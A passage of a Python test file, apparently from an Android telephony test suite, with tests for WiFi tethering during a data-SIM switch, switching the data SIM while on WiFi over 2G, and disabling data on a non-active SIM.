            1. DUT is able to start WiFi tethering.
            2. PhoneB connected to DUT's softAP and able to browse Internet.
            3. DUT WiFi tethering is still on. Phone call works OK. Data is
               suspended; PhoneB is still connected to DUT's softAP, but no
               data is available.
            4. DUT data resumes, and PhoneB has Internet access.

        Returns:
            True if success.
            False if failed.
        """
        return self._test_wifi_tethering_enabled_add_voice_call(
            GEN_2G, DIRECTION_MOBILE_TERMINATED, False)

    @TelephonyBaseTest.tel_test_wrap
    def test_wifi_tethering_msim_switch_data_sim(self):
        """Tethering enabled + switch data SIM.

        Steps:
            1. Start WiFi Tethering on <Default Data SIM>.
            2. PhoneB connects to DUT's softAP.
            3. DUT changes the Default Data SIM.

        Expected Results:
            1. DUT is able to start WiFi tethering.
            2. PhoneB connected to DUT's softAP and able to browse Internet.
            3. DUT Data changed to the 2nd SIM, WiFi tethering should
               continue, and PhoneB should have Internet access.

        Returns:
            True if success.
            False if failed.
        """
        ads = self.android_devices
        current_data_sub_id = ads[0].droid.subscriptionGetDefaultDataSubId()
        current_sim_slot_index = get_slot_index_from_subid(
            self.log, ads[0], current_data_sub_id)
        self.log.info("Current Data is on subId: {}, SIM slot: {}".format(
            current_data_sub_id, current_sim_slot_index))
        if not self._test_setup_tethering(ads):
            self.log.error("Verify Internet access failed.")
            return False
        try:
            # Start WiFi Tethering
            if not wifi_tethering_setup_teardown(
                    self.log,
                    ads[0],
                    [ads[1]],
                    ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
                    check_interval=10,
                    check_iteration=2,
                    do_cleanup=False):
                self.log.error("WiFi Tethering failed.")
                return False
            for i in range(0, 2):
                next_sim_slot_index = \
                    {SIM1_SLOT_INDEX: SIM2_SLOT_INDEX,
                     SIM2_SLOT_INDEX: SIM1_SLOT_INDEX}[current_sim_slot_index]
                self.log.info(
                    "Change Data to SIM slot: {}".format(next_sim_slot_index))
                if not change_data_sim_and_verify_data(self.log, ads[0],
                                                       next_sim_slot_index):
                    self.log.error("Failed to change data SIM.")
                    return False
                current_sim_slot_index = next_sim_slot_index
                if not verify_http_connection(self.log, ads[1]):
                    self.log.error("Client should have Internet Access.")
                    return False
        finally:
            ads[1].droid.telephonyToggleDataConnection(True)
            WifiUtils.wifi_reset(self.log, ads[1])
            if ads[0].droid.wifiIsApEnabled():
                WifiUtils.stop_wifi_tethering(self.log, ads[0])
        return True

    @TelephonyBaseTest.tel_test_wrap
    def test_msim_cell_data_switch_to_wifi_switch_data_sim_2g(self):
        """Switch Data SIM while data is on WiFi (2G network).

        Steps:
            1. Data on default Data SIM.
            2. Turn on WiFi, then data should be on WiFi.
            3. Switch Data to another SIM. Disable WiFi.

        Expected Results:
            1. Verify Data on Cell.
            2. Verify Data on WiFi.
            3. After WiFi is disabled, Cell Data is available on the 2nd SIM.

        Returns:
            True if success.
            False if failed.
        """
        ad = self.android_devices[0]
        current_data_sub_id = ad.droid.subscriptionGetDefaultDataSubId()
        current_sim_slot_index = get_slot_index_from_subid(
            self.log, ad, current_data_sub_id)
        if current_sim_slot_index == SIM1_SLOT_INDEX:
            next_sim_slot_index = SIM2_SLOT_INDEX
        else:
            next_sim_slot_index = SIM1_SLOT_INDEX
        next_data_sub_id = get_subid_from_slot_index(self.log, ad,
                                                     next_sim_slot_index)
        self.log.info("Current Data is on subId: {}, SIM slot: {}".format(
            current_data_sub_id, current_sim_slot_index))
        if not ensure_network_generation_for_subscription(
                self.log,
                ad,
                ad.droid.subscriptionGetDefaultDataSubId(),
                GEN_2G,
                voice_or_data=NETWORK_SERVICE_DATA):
            self.log.error("Device data does not attach to 2G.")
            return False
        if not verify_http_connection(self.log, ad):
            self.log.error("No Internet access on default Data SIM.")
            return False

        self.log.info("Connect to WiFi and verify Internet access.")
        if not ensure_wifi_connected(self.log, ad, self.wifi_network_ssid,
                                     self.wifi_network_pass):
            self.log.error("WiFi connect failed.")
            return False
        if (not wait_for_wifi_data_connection(self.log, ad, True) or
                not verify_http_connection(self.log, ad)):
            self.log.error("Data is not on WiFi")
            return False

        try:
            self.log.info(
                "Change Data SIM, Disable WiFi and verify Internet access.")
            set_subid_for_data(ad, next_data_sub_id)
            WifiUtils.wifi_toggle_state(self.log, ad, False)
            if not wait_for_data_attach_for_subscription(
                    self.log, ad, next_data_sub_id,
                    MAX_WAIT_TIME_NW_SELECTION):
                self.log.error("Failed to attach data on subId:{}".format(
                    next_data_sub_id))
                return False
            if not verify_http_connection(self.log, ad):
                self.log.error("No Internet access after changing Data SIM.")
                return False
        finally:
            self.log.info("Change Data SIM back.")
            set_subid_for_data(ad, current_data_sub_id)
        return True

    @TelephonyBaseTest.tel_test_wrap
    def test_disable_data_on_non_active_data_sim(self):
        """Disable data on the non-active Data SIM.

        Steps:
            1. Data on default Data SIM.
            2. Disable data on the non-active Data SIM.

        Expected Results:
            1. Verify Data Status on the Default Data SIM and the non-active
               Data SIM.

        Returns:
            True if success.
            False if failed.
        """
        ad = self.android_devices[0]
        current_data_sub_id = ad.droid.subscriptionGetDefaultDataSubId()
        current_sim_slot_index = get_slot_index_from_subid(
            self.log, ad, current_data_sub_id)
        if current_sim_slot_index == SIM1_SLOT_INDEX:
            non_active_sim_slot_index = SIM2_SLOT_INDEX
        else:
            non_active_sim_slot_index = SIM1_SLOT_INDEX
        non_active_sub_id = get_subid_from_slot_index(
            self.log, ad, non_active_sim_slot_index)
        self.log.info("Current Data is on subId: {}, SIM slot: {}".format(
            current_data_sub_id, current_sim_slot_index))
        if not ensure_network_generation_for_subscription(
                self.log,
                ad,
                ad.droid.subscriptionGetDefaultDataSubId(),
                GEN_2G,
                voice_or_data=NETWORK_SERVICE_DATA):
            self.log.error("Device data does not attach to 2G.")
            return False
        if not verify_http_connection(self.log, ad):
            self.log.error("No Internet access on default Data SIM.")
            return False
        if ad.droid.telephonyGetDataConnectionState() != DATA_STATE_CONNECTED:
            self.log.error("Data Connection State should be connected.")
            return False
        # TODO: Check Data state for non-active subId.
        try:
            self.log.info("Disable Data on Non-Active Sub ID")
            ad.droid.telephonyToggleDataConnectionForSubscription(
                non_active_sub_id, False)
            # TODO: Check Data state for non-active subId.
            if ad.droid.telephonyGetDataConnectionState(
            ) != DATA_STATE_CONNECTED:
                self.log.error("Data Connection State should be connected.")
                return False
        finally:
            self.log.info("Enable Data on Non-Active Sub ID")
            ad.droid.telephonyToggleDataConnectionForSubscription(
                non_active_sub_id, True)
        return True
""" Tests End """